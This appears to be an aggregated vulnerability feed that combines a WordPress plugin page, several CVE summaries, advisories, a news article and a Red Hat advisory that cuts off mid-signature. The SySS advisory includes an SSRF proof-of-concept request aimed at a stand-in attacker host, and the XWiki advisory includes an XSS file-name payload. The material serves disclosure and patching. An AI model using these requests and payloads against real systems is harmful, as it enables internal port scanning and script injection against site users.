Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Apasionados Export Post Info plugin <= 1.1.0 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

**Description**

This plugin exports posts Date published, Post title, Word Count, Status, URL and Category to a CSV file, allowing to have an overview of the topics and titles published in the blog.

We created this plugin because we generate large amounts of content for blogs and we often need to lookup the topics that were already covered before in a blog. As we don’t want to export the titles by hand we developed this plugin.

**What can I do with this plugin?**

This plugin exports posts Date published, Post title, Word Count, Status, URL and Category to a CSV file that can be imported into Excel.

**What ideas is this plugin based on?**

We were searching for a plugin that allowed us to export the post titles and found Export All URLs. Unfortunately the plugin didn’t export the publish date, status and word count, so we decided to create a new plugin with this information and the the ability to translate it.

**System requirements**

PHP version 5.5 or greater.

**Export Post Info to CSV Plugin in your Language!**

This first release is avaliable in English and Spanish. In the “languages” folder we have included the necessarry files to translate this plugin.

If you would like the plugin in your language and you’re good at translating, please drop us a line at Contact us.

**Further Reading**

You can access the description of the plugin in Spanish at: Export Post Info to CSV en español.

**Contact**

For further information please send us an email.

**Translating WordPress Plugins**

The steps involved in translating a plugin are:

1.  Run a tool over the code to produce a POT file (Portable Object Template), simply a list of all localizable text. Our plugins allready havae this POT file in the /languages/ folder.
2.  Use a plain text editor or a special localization tool to generate a translation for each piece of text. This produces a PO file (Portable Object). The only difference between a POT and PO file is that the PO file contains translations.
3.  Compile the PO file to produce a MO file (Machine Object), which can then be used in the theme or plugin.

In order to translate a plugin you will need a special software tool like poEdit, which is a cross-platform graphical tool that is available for Windows, Linux, and Mac OS X.

The naming of your PO and MO files is very important and must match the desired locale. The naming convention is: language_COUNTRY.po and plugins have an additional naming convention whereby the plugin name is added to the filename: pluginname-fr_FR.po

That is, the plugin name name must be the language code followed by an underscore, followed by a code for the country (in uppercase). If the encoding of the file is not UTF-8 then the encoding must be specified.

For example:

*   en\_US � US English
*   en\_UK � UK English
*   es\_ES � Spanish from Spain
*   fr\_FR � French from France
*   zh\_CN � Simplified Chinese

A list of language codes can be found here, and country codes can be found here. A full list of encoding names can also be found at IANA.

**Screenshots**

**Installation**

1.  First you will have to upload the plugin to the /wp-content/plugins/ folder.
2.  Then activate the plugin in the plugin panel.
3.  Go to SETTINGS / EXPORT POST INFO.
4.  Save a random string to make it harder for somebody to access your exported data.
5.  Download your CSV file.

**FAQ**

**Why did you make this plugin?**

We couldn’t find a plugin that would give us the functionality we were looking for:  
1) Export publish date.  
2) Export word count.  
3) Easy translation of the plugin into other languages. So far English and Spanish translations are included.

**Why do I have to setup a random string for the name of the export CSV file?**

Other plugins always export the file with the same name and in the same folder so it’s easy to access this file. We don’t want that this file can be easily found, so we decided to let you setup a random string to make the file name harder to guess.

**Does Export Post Info make changes to the database?**

Yes. It created an entry in the options table where the random string is stored.

**How can I check out if the plugin works for me?**

Install and activate. Go to settings / Export Post Info. Save random string. And download CSV file.

**How can I remove Export Post Info to CSV?**

You can simply activate, deactivate or delete it in your plugin management section.

**Which PHP version do I need?**

This plugin has been tested and works with PHP versions 5.5 and greater. WordPress itself recommends using PHP version 7.3 or greater. If you’re using a PHP version lower than 5.5 please upgrade your PHP version or contact your Server administrator.

**Are there any known incompatibilities?**

Yes. On a multi-language site the export will not work correctly.

**Is this plugin compatible with WPML**

Yes, but only the posts of the main language are exported. Post in secondary languages are not exported at this moment. We are working on this because we would like to have this feature but for us it isn’t easy to code.

**Are there any server requirements?**

Yes. The plugin requires a PHP version 5.5 or higher and we recommend using PHP version 7.3 or higher.

**Do you make use of Export Post Info to CSV yourself?**

Of course we do. That’s why we created it. 😉

**Reviews**

From uploading the plugin to downloading the CSV file took about 15 seconds! Just perfect - thank you!

This plugin exported exactly what I needed, and it did it quickly and painlessly. Thanks very much to the devs!

Time saver, works just fine

Super plugin, très simple à utiliser. Merci !

Thank you so much for this amazing little plugin that did exactly what I needed. Saved me hours of work in creating a spreadsheet with all my posts so I can create an optimization checklist. The other popular export all posts plugin only exports the post title, url and category. Without the date and other fields, I would have to go in and manually add that data. Export Post Info (this plugin) did all of it perfectly. Keep up the great work!

October 11, 2018

Not sure why this plug in has no reviews. Did for me EXACTLY what I needed even though it is two years old. Muchas Gracias

Read all 6 reviews

**Contributors & Developers**

“Export Post Info” is open source software. The following people have contributed to this plugin.

Contributors

*    apasionados

**Changelog****1.2.0 (06/Sep/2022)**

*   Security update: Please update your plugin. We escaped data to increase your security.
*   Corrected PHP notices when debug was active.

**1.1.0 (25/Aug/2019)**

*   Now posts with status published, future and private are exported. Until now only posts with status published were exported.
*   Added post status column to the export file.
*   PHP version must be 5.6 or higher. Recommended PHP version: 7.3.

**1.0.4 (08/Abr/2017)**

*   Cleaned up code + Changed functions name to be unique and avoid conflicts with other plugins or themes.

**1.0.3 (07/Abr/2017)**

*   Added check for PHP version when activating the plugin. PHP version must be 5.5 o greater.

**1.0.2 (07/Abr/2017)**

*   Solved error in Word Count with words containing UTF-8 characters.

**1.0.1 (07/Abr/2017)**

*   Word count would not count all words of a post if a tag was present.

**1.0.0 (07/Abr/2017)**

*   First official release.

CVE-2022-38068: Export Post Info

Authenticated (shop manager+) Reflected Cross-Site Scripting (XSS) vulnerability in AlgolPlus Advanced Order Export For WooCommerce plugin <= 3.3.1 at WordPress.

CVE-2022-35275

Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Hans Matzen's wp-forecast plugin <= 7.5 at WordPress.

CVE-2022-35725

Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Liam Gladdy / Thirty8 Digital Culture Object plugin <= 4.0.1 at WordPress.

CVE-2022-36356

Cross-site Scripting (XSS) - Stored in GitHub repository appwrite/appwrite prior to 1.0.0-RC1.

CVE-2022-2925

A Server-Side Request Forgery issue in Canto Cumulus through 11.1.3 allows attackers to enumerate the internal network, overload network resources, and possibly have unspecified other impact via the server parameter to the /cwc/login login form.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2022-023 Product: Canto Cumulus Manufacturer: Canto Inc. Affected Version(s): Through 11.1.3 Tested Version(s): 11.1.3 (Build 26f5823e) Vulnerability Type: Server-Side Request Forgery (CWE-918) Risk Level: High Solution Status: Mitigation possible Manufacturer Notification: 2022-03-25 Solution Date: No solution Public Disclosure: 2022-06-01 CVE Reference: Not yet assigned Author of Advisory: Thibaud Kehler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Canto Cumulus is a digital asset management (DAM).\[1\] Due to missing validation of untrusted input, the Cumulus web server is vulnerable to server-side request forgery (SSRF) with an unknown proprietary protocol. This behavior poses a risk for denial-of-service (DoS) attacks, impersonation attacks and attacks on the protocol with the theoretical result of remote code execution (RCE) or authentication bypass. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: When logging in to the web server via the form at the URL https://hostname.example/cwc/login, a hidden URL parameter 'server' is sent to the server in the respective HTTP POST request to https://hostname.example/cwc/catalog. Afterwards, the web server establishes a TCP connection to the system specified in that request via an unknown protocol. This yields the following problems: \* Denial of service: The web server keeps the TCP connection open for around 60 seconds. This could be misused to fill limited resources on the server or the server's infrastructure, e.g. NAT tables or connection pools, resulting in a DoS. \* Internal port scan: The web server would respond differently if it was able to establish a connection to the specified TCP port. An attacker could use this behavior to conduct a port scan on the internal network. \* Authentication bypass (theoretical): As the server is specified during authentication, it might be possible that the server-side request is used to verify the credentials given to the login form. An attacker could pretend to be an authentication server and forge a successful login or elevated privileges to the web application. \* Protocol attacks (theoretical): The server-side request uses an unknown binary protocol. An attacker might launch further attacks on that protocol, e.g. buffer overflow or deserialization attacks. In the worst case, if the server implementation of the protocol is vulnerable to such attacks, this will result in RCE on the server. SySS recommends restricting web server-side requests to a limited set of trusted servers. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): An attacker can specify an arbitrary IP address / hostname and port, as depicted in the following HTTP POST request: POST /cwc/catalog HTTP/1.1 Host: hostname.example User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:98.0) Gecko/20100101 Firefox/98.0 Content-Type: application/x-www-form-urlencoded Content-Length: 123 OWASP\_CSRFTOKEN=V1UT-I5A9-QIYJ-HG0C-A1UZ-8Z06-VQ6I-Q6CM&user=guest&password=guest&encmpoding=UTF-8&server=server.attacker:80 During the response, the web server connects to the specified TCP port on the specified host via an unknown proprietary protocol: # ncat -nlvp 80 | hexdump -C Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::80 Ncat: Listening on 0.0.0.0:80 Ncat: Connection from \[WAN IP\]. Ncat: Connection from \[WAN IP\]:10402. 00000000 00 00 00 28 72 65 63 6f 00 00 00 02 00 00 00 04 |...(reco........| 00000010 63 4d 49 44 4c 6f 6e 67 73 69 52 51 00 00 00 04 |cMIDLongsiRQ....| 00000020 53 65 72 23 4c 6f 6e 67 00 04 77 7b 00 00 00 18 |Ser#Long..w{....| 00000030 72 65 63 6f 00 00 00 01 00 00 00 04 63 4d 49 44 |reco........cMID| 00000040 4c 6f 6e 67 51 75 69 74 |LongQuit| 00000048 If the specified host responds in an unexpected way, the web server closes the server-side connection and responds to the initial HTTP request with HTTP error code 302 and a redirection to an error page: HTTP/1.1 302 Server: nginx Date: Wed, 23 Mar 2022 16:31:43 GMT Content-Type: text/json;charset=utf-8 Content-Length: 0 Connection: keep-alive Set-Cookie: JSESSIONID=02505EB227E875FFAC9CB283AF8F16CB; Path=/cwc; Secure; HttpOnly X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=16070400 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Location: /cwc/error.jspx?errorID=CumulusError&errorTitle=Cumulus+error&errorTitle=Cumulus+error&errorMessage=An+error+occured.&disableButtonDashboard=true If the DNS name cannot be resolved or if the specified TCP port is unreachable, the server responds with HTTP error code 500 and renders the login form with HTML containing an additional error message which states that the server could not be reached. This differing behavior enables the internal port scan. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The manufacturer has not released a patch and will not address the vulnerability. The manufacturer recommends securing the Cumulus server by using a firewall. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-03-18: Vulnerability discovered 2022-03-25: Vulnerability reported to the manufacturer 2022-05-11: Manufacturer informed SySS that it will not address the vulnerability 2022-06-01: Public disclosure of the vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for Canto Cumulus https://www.canto.com/de/cumulus/ \[2\] SySS Security Advisory SYSS-2022-023 (not yet published) https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-023.txt \[3\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Thibaud Kehler of SySS GmbH. E-Mail: thibaud.kehler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Thibaud\_Kehler.asc Key ID: 0xB645 7D7A Key Fingerprint: CF29 54F1 1B7F 2FF5 7ED9 9BAD E9C7 9866 B645 7D7A ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEzylU8Rt/L/V+2Zut6ceYZrZFfXoFAmKWCXIACgkQ6ceYZrZF fXqI7A//ZiwtJccj1fcb1EcVK1l4jHU3ZXcJrcYFib4jqzYgZ+NQXA1OVFmJ8P9a MaK9/9GCTjRUnHL0zJfv2Q18GwDaFcq3Ecv61l0IttgOwPmZk3bdGhbiZbuNkid9 n8WBCtzMoPYb8b8BvGDmbjhGcIWfLBJ4hf9nspeIP12MtYNe0qwYXQJsDrZwmUgu bqD5AnXItyYSDe690LRweAh5vAtdvtp+7SQLOPfi49QyG9sxb9jw1qsK8KVZNutt nIwSD5SFrCCgVvEn6E02FHGW7ttEivxSPTN60FsoGhhCD7V1zeu2teNaZvarETek cnSuYgNNBCdPhCm6WDDMgw5vNOUqg0UE1CqZjZ84DBOu4ABBMF4PV9JBFYbOeWTK XYmVsREJVFnvF+qmXDVfEoByaKsXX1yIZkJwGYFXGS3bvFpaipMGLbRFzc49abPI sv5Vth94AmnTyHsG73tM93d3y5BRLpwxwuRSmG5PRzbuZet8ThPH4Hoc1OAysNTa zsCm3VkSemX0Ba8z6mL4IwuknYoetuKQli37jAx7jGsfetFc9tKvHsk3dQ9w+wQG 040DaLa8NsBh+b1PeQZj6AVC+qH6OgGADl5l0Dnh3VcQW3eWUV0YgQofgOsbili6 6CGZNJwE8HkWX5U4HuTaF/A3b8BaFd0IailYTDGc3SaLz4XOAyU= =FDje -----END PGP SIGNATURE-----

CVE-2022-40305

XWiki Platform Web Parent POM contains Web resources for the XWiki platform, a generic wiki platform. Starting with version 1.0 and prior to versions 13.10.6 and 14.30-rc-1, it's possible to store JavaScript which will be executed by anyone viewing the history of an attachment containing javascript in its name. This issue has been patched in XWiki 13.10.6 and 14.3RC1. As a workaround, it is possible to replace `viewattachrev.vm`, the entry point for this attack, by a patched version from the patch without updating XWiki.

**Impact**

It's possible to store a JavaScript which will be executed by anyone viewing the history of an attachment containing javascript in its name.

For example, attachment a file with name ><img src=1 onerror=alert(1)>.jpg will execute the alert.

**Patches**

This issue has been patched in XWiki 13.10.6 and 14.3RC1.

**Workarounds**

It is possible to replace viewattachrev.vm, the entry point for this attack, by a patched version from the patch without updating XWiki.

**References**

*   https://jira.xwiki.org/browse/XWIKI-19612

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in Jira XWiki.org
*   Email us at Security Mailing List

CVE-2022-36094: XSS in the attachment history

TastyIgniter v3.5.0 was discovered to contain a cross-site scripting (XSS) vulnerability which allows attackers to execute arbitrary web scripts or HTML via a crafted payload.

Vendor

Product

TastyIgniter

Affected Version(s)

3.5.0 and probably prior

Tested Version(s)

3.5.0

Vendor Notification

13 June 2022

Advisory Publication

13 June 2022 \[without technical details\]

Vendor Fix

N/A

Public Disclosure

13 June 2022

Latest Modification

09 June 2022

CVE Identifier

Pending

Product Description

A free online ordering system for restaurants & takeaways based on Laravel PHP Framework.

Credits

Oswaldo Morales Rodríguez Security Researcher & Penetration Tester @wizlynx group

**Stored XSS**

**Severity**: **Medium**

**CVSS Score**: 5.4

**CWE-ID**: CWE-79

**Status**: Open

**Vulnerability Description**

TastyIgniter is affected by Stored Cross-Site Scripting (XSS) vulnerability affecting version 3.5.0. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content. The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

**CVSS Base Score**

**Attack Vector**

Network

**Scope**

Changed

**Attack Complexity**

Low

**Confidentiality Impact**

Low

**Privileges Required**

Low

**Integrity Impact**

Low

**User Interaction**

Required

**Availability Impact**

None

Full details about the vulnerability will be disclosed once the vendor has provided a patch.

Top

CVE-2022-38256: wizlynx group | Stored Cross-Site Scripting (XSS) Vulnerability in TastyIgniter v3.5.0

pfSense and sensibility

Security researchers from IHTeam have uncovered a serious vulnerability in a plugin to the pfSense firewall technology.

The affected pfBlockerNG plugin is not installed by default and the problem was, in any case, resolved by a software update published in June.

This is just as well because the underlying flaw created an unauthenticated remote code execution (RCE) as root risk on affected installations, according to IHTeam. The pfSense pfBlockerNG vulnerability is tracked as CVE-2022-31814.

**Root cause analysis**

pfSense is a firewall/router software distribution based on FreeBSD. The open source\-based network firewall technology can be installed on bare metal or as a virtual appliance.

pfBlockerNG is a plugin component available within pfSense that will facilitate allow-listing or deny-listing of entire IP ranges. It is often used to block entire countries from communicating with networks running pfSense, according to researchers, who point out several factors that call particular attention to the problem.

“The vulnerability is a remote command execution exploitable from an unauthenticated perspective and, on top of that, the web server is running with root privileges,” a representation of IHTeam told The Daily Swig.

Read more of the latest network security news

Importantly, the vulnerability is limited to a plugin of pfSense that is not installed by default.

“It is difficult to say how many systems are affected without actively crawling each of the exposed system,” according to IHTeam.

Accordingly to Shodan, there are around 27,000 exposed pfSense machines on the internet. This should not be taken as any indication of the number of vulnerable systems since many will not be running the affected pfBlockerNG plugin, without considering that even vulnerable installations have likely been patched since the software was updated.

In response to a query from The Daily Swig, the developer of pfBlockerNG said: “The only version that was affected is version 2.1.4\_26 and below. This has been patched and can be upgraded in pkg manager. pfBlockerNG-devel is unaffected and is the recommended version to use.”

**Practical impact**

Netgate, which distributes the pfSense firewall, added in response to a related query: “The problem they \[the researchers\] found was in the pfBlockerNG package but had already been addressed in the pfBlockerNG-devel \[latest, cutting edge version of the\] package, which is the version the package maintainer recommends everyone use.”

Netgate stated that for the problem to become exposed “requires access to the web server on the firewall (which should never be open on WAN and is often restricted internally when configured per best practices), the overall practical impact was considered extremely low despite it having a high score in theory.”

IHTeam said that developers are still shipping and allowing users to install between the 2.x branch and the 3.x branch (the -development one).

“The misunderstanding can be easily resolved it they would simply remove the 2.x branch from the available plugin list,” the researchers added.

IHTeam came across the vulnerability in pfBlockerNG during an independent security assessment of what turned out to be a vulnerable version of the product. A technical write-up of the issue was published in a blog post by IHTeam on Monday (September 5).

**Dev lessons**

A researcher from IHTeam, who asked not to be named, told The Daily Swig that the characteristics of the bug offered lessons for other software developers.

The researcher explained: “To avoid these types of vulnerabilities, developers should take extra care while handling user input (not only via direct and requests, but also via input that might be passed in request headers such as , or ).

“All user input should be carefully analysed and sanitised before being passed to the application. This is also valid for other types of attacks such as cross-site scripting (XSS) or SQL injection, not only for command execution,” they added.

RELATED WatchGuard firewall exploit threatens appliance takeover

Vendor disputes seriousness of firewall plugin RCE flaw

Red Hat Security Advisory 2022-6393-01 - The ovirt-engine package provides the Red Hat Virtualization Manager, a centralized management platform that allows system administrators to view and manage virtual machines. The Manager provides a comprehensive range of features including search capabilities, resource management, live migrations, and virtual infrastructure provisioning. Issues addressed include code execution, cross site scripting, and denial of service vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: RHV Manager (ovirt-engine) [ovirt-4.5.2] bug fix and security update  
Advisory ID:       RHSA-2022:6393-01  
Product:           Red Hat Virtualization  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6393  
Issue date:        2022-09-08  
CVE Names:         CVE-2020-11022 CVE-2020-11023 CVE-2021-22096  
                   CVE-2021-23358 CVE-2022-2806 CVE-2022-31129  
====================================================================  
1. Summary:

Updated ovirt-engine packages that fix several bugs and add various  
enhancements are now available.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4 - noarch

3. Description:

The ovirt-engine package provides the Red Hat Virtualization Manager, a  
centralized management platform that allows system administrators to view  
and manage virtual machines. The Manager provides a comprehensive range of  
features including search capabilities, resource management, live  
migrations, and virtual infrastructure provisioning.

Security Fix(es):

* nodejs-underscore: Arbitrary code execution via the template function  
(CVE-2021-23358)

* moment: inefficient parsing algorithm resulting in DoS (CVE-2022-31129)

* jquery: Cross-site scripting due to improper injQuery.htmlPrefilter  
method (CVE-2020-11022)

* jquery: Untrusted code execution via <option> tag in HTML passed to DOM  
manipulation methods (CVE-2020-11023)

* ovirt-log-collector: RHVM admin password is logged unfiltered  
(CVE-2022-2806)

* springframework: malicious input leads to insertion of additional log  
entries (CVE-2021-22096)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Previously, running engine-setup did not always renew OVN certificates  
close to expiration or expired. With this release, OVN certificates are  
always renewed by engine-setup when needed. (BZ#2097558)

* Previously, the Manager issued warnings of approaching certificate  
expiration before engine-setup could update certificates. In this release  
expiration warnings and certificate update periods are aligned, and  
certificates are updated as soon as expiration warnings occur. (BZ#2097725)

* With this release, OVA export or import work on hosts with a non-standard  
SSH port. (BZ#2104939)

* With this release, the certificate validity test is compatible with RHEL  
8 and RHEL 7 based hypervisors. (BZ#2107250)

* RHV 4.4 SP1 and later are only supported on RHEL 8.6, customers cannot  
use RHEL 8.7 or later, and must stay with RHEL 8.6 EUS. (BZ#2108985)

* Previously, importing templates from the Administration Portal did not  
work. With this release, importing templates from the Administration Portal  
is possible. (BZ#2109923)

* ovirt-provider-ovn certificate expiration is checked along with other RHV  
certificates. If ovirt-provider-ovn is about to expire or already expired,  
a warning or alert is raised in the audit log. To renew the  
ovirt-provider-ovn certificate, administators must run engine-setup. If  
your ovirt-provider-ovn certificate expires on a previous RHV version,  
upgrade to RHV 4.4 SP1 batch 2 or later, and ovirt-provider-ovn certificate  
will be renewed automatically in the engine-setup. (BZ#2097560)

* Previously, when importing a virtual machine with manual CPU pinning, the  
manual pinning string was cleared, but the CPU pinning policy was not set  
to NONE. As a result, importing failed. In this release, the CPU pinning  
policy is set to NONE if the CPU pinning string is cleared, and importing  
succeeds. (BZ#2104115)

* Previously, the Manager could start a virtual machine with a Resize and  
Pin NUMA policy on a host without an equal number of physical sockets to  
NUMA nodes. As a result, wrong pinning was assigned to the policy. With  
this release, the Manager does not allow the virtual machine to be  
scheduled on such a virtual machine, and the pinning is correct based on  
the algorithm. (BZ#1955388)

* Rebase package(s) to version: 4.4.7.  
Highlights, important fixes, or notable enhancements: fixed BZ#2081676  
(BZ#2104831)

* In this release, rhv-log-collector-analyzer provides detailed output for  
each problematic image, including disk names, associated virtual machine,  
the host running the virtual machine, snapshots, and current SPM. The  
detailed view is now the default. The compact option can be set by using  
the --compact switch in the command line. (BZ#2097536)

* UnboundID LDAP SDK has been rebased on upstream version 6.0.4. See  
https://github.com/pingidentity/ldapsdk/releases for changes since version  
4.0.14 (BZ#2092478)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/2974891

5. Bugs fixed (https://bugzilla.redhat.com/):

1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method  
1850004 - CVE-2020-11023 jquery: Untrusted code execution via <option> tag in HTML passed to DOM manipulation methods  
1939284 - clusterPolicyWeightFunctionInfo tooltip needs improvement in relation to Rank Selector policy unit.  
1944286 - CVE-2021-23358 nodejs-underscore: Arbitrary code execution via the template function  
1955388 - Auto Pinning Policy only pins some of the vCPUs on a single NUMA host  
1974974 - Not possible to determine migration policy from the API, even though documentation reports that it can be done.  
2034584 - CVE-2021-22096 springframework: malicious input leads to insertion of additional log entries  
2080005 - CVE-2022-2806 ovirt-log-collector: RHVM admin password is logged unfiltered  
2092478 - Upgrade unboundid-ldapsdk to 6.0.4  
2094577 - rhv-image-discrepancies must ignore small disks created by OCP  
2097536 - [RFE] Add disk name and uuid to problems output  
2097558 - Renew ovirt-provider-ovn.cer certificates during engine-setup  
2097560 - Warning when ovsdb-server certificates are about to expire(OVN certificate)  
2097725 - Certificate Warn period and automatic renewal via engine-setup do not match  
2104115 - RHV 4.5 cannot import VMs with cpu pinning  
2104831 - Upgrade ovirt-log-collector to 4.4.7  
2104939 - Export OVA when using host with port other than 22  
2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS  
2107250 - Upgrade of the host failed as the RHV 4.3 hypervisor is based on RHEL 7 with openssl 1.0.z, but RHV Manager 4.4 uses the openssl 1.1.z syntax  
2107267 - ovirt-log-collector doesn't generate database dump  
2108985 - RHV 4.4 SP1 EUS requires RHEL 8.6 EUS (RHEL 8.7+ releases are not supported on RHV 4.4 SP1 EUS)  
2109923 - Error when importing templates in Admin portal

6. Package List:

RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4:

Source:  
ovirt-engine-4.5.2.4-0.1.el8ev.src.rpm  
ovirt-engine-dwh-4.5.4-1.el8ev.src.rpm  
ovirt-engine-extension-aaa-ldap-1.4.6-1.el8ev.src.rpm  
ovirt-engine-ui-extensions-1.3.5-1.el8ev.src.rpm  
ovirt-log-collector-4.4.7-2.el8ev.src.rpm  
ovirt-web-ui-1.9.1-1.el8ev.src.rpm  
rhv-log-collector-analyzer-1.0.15-1.el8ev.src.rpm  
unboundid-ldapsdk-6.0.4-1.el8ev.src.rpm  
vdsm-jsonrpc-java-1.7.2-1.el8ev.src.rpm

noarch:  
ovirt-engine-4.5.2.4-0.1.el8ev.noarch.rpm  
ovirt-engine-backend-4.5.2.4-0.1.el8ev.noarch.rpm  
ovirt-engine-dbscripts-4.5.2.4-0.1.el8ev.noarch.rpm  
ovirt-engine-dwh-4.5.4-1.el8ev.noarch.rpm  
ovirt-engine-dwh-grafana-integration-setup-4.5.4-1.el8ev.noarch.rpm  
ovirt-engine-dwh-setup-4.5.4-1.el8ev.noarch.rpm  
ovirt-engine-extension-aaa-ldap-1.4.6-1.el8ev.noarch.rpm  
ovirt-engine-extension-aaa-ldap-setup-1.4.6-1.el8ev.noarch.rpm  
ovirt-engine-health-check-bundler-4.5.2.4-0.1.el8ev.noarch.rpm  
ovirt-engine-restapi-4.5.2.4-0.1.el8ev.noarch.rpm  
ovirt-engine-setup-4.5.2.4-0.1.el8ev.noarch.rpm  
ovirt-engine-setup-base-4.5.2.4-0.1.el8ev.noarch.rpm  
ovirt-engine-setup-plugin-cinderlib-4.5.2.4-0.1.el8ev.noarch.rpm  
ovirt-engine-setup-plugin-imageio-4.5.2.4-0.1.el8ev.noarch.rpm  
ovirt-engine-setup-plugin-ovirt-engine-4.5.2.4-0.1.el8ev.noarch.rpm  
ovirt-engine-setup-plugin-ovirt-engine-common-4.5.2.4-0.1.el8ev.noarch.rpm  
ovirt-engine-setup-plugin-vmconsole-proxy-helper-4.5.2.4-0.1.el8ev.noarch.rpm  
ovirt-engine-setup-plugin-websocket-proxy-4.5.2.4-0.1.el8ev.noarch.rpm  
ovirt-engine-tools-4.5.2.4-0.1.el8ev.noarch.rpm  
ovirt-engine-tools-backup-4.5.2.4-0.1.el8ev.noarch.rpm  
ovirt-engine-ui-extensions-1.3.5-1.el8ev.noarch.rpm  
ovirt-engine-vmconsole-proxy-helper-4.5.2.4-0.1.el8ev.noarch.rpm  
ovirt-engine-webadmin-portal-4.5.2.4-0.1.el8ev.noarch.rpm  
ovirt-engine-websocket-proxy-4.5.2.4-0.1.el8ev.noarch.rpm  
ovirt-log-collector-4.4.7-2.el8ev.noarch.rpm  
ovirt-web-ui-1.9.1-1.el8ev.noarch.rpm  
python3-ovirt-engine-lib-4.5.2.4-0.1.el8ev.noarch.rpm  
rhv-log-collector-analyzer-1.0.15-1.el8ev.noarch.rpm  
rhvm-4.5.2.4-0.1.el8ev.noarch.rpm  
unboundid-ldapsdk-6.0.4-1.el8ev.noarch.rpm  
unboundid-ldapsdk-javadoc-6.0.4-1.el8ev.noarch.rpm  
vdsm-jsonrpc-java-1.7.2-1.el8ev.noarch.rpm  
vdsm-jsonrpc-java-javadoc-1.7.2-1.el8ev.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2020-11022  
https://access.redhat.com/security/cve/CVE-2020-11023  
https://access.redhat.com/security/cve/CVE-2021-22096  
https://access.redhat.com/security/cve/CVE-2021-23358  
https://access.redhat.com/security/cve/CVE-2022-2806  
https://access.redhat.com/security/cve/CVE-2022-31129  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYxnqRtzjgjWX9erEAQiQOw//XOS172gkbNeuoMSW1IYiEpJG4zQIvT2J  
VvyizOMlQzpe49Bkopu1zj/e8yM1eXNIg1elPzA3280z7ruNb4fkeoXT7vM5mB/0  
jRAr1ja9ZHnZmEW60X3WVhEBjEXCeOv5CWBgqzdQWSB7RpPqfMP7/4kHGFnCPZxu  
V/n+Z9YKoDxeiW19tuTdU5E5cFySVV8JZAlfXlrR1dz815Ugsm2AMk6uPwjQ2+C7  
Uz3zLQLjRjxFk+qSph8NYbOZGnUkypWQG5KXPMyk/Cg3jewjMkjAhzgcTJAdolRC  
q3p9kD5KdWRe+3xzjy6B4IsSSqvEyHphwrRv8wgk0vIAawfgi76+jL7n/C07rdpA  
Qg6zlDxmHDrZPC42dsW6dXJ1QefRQE5EzFFJcoycqvWdlRfXX6D1RZc5knSQb2iI  
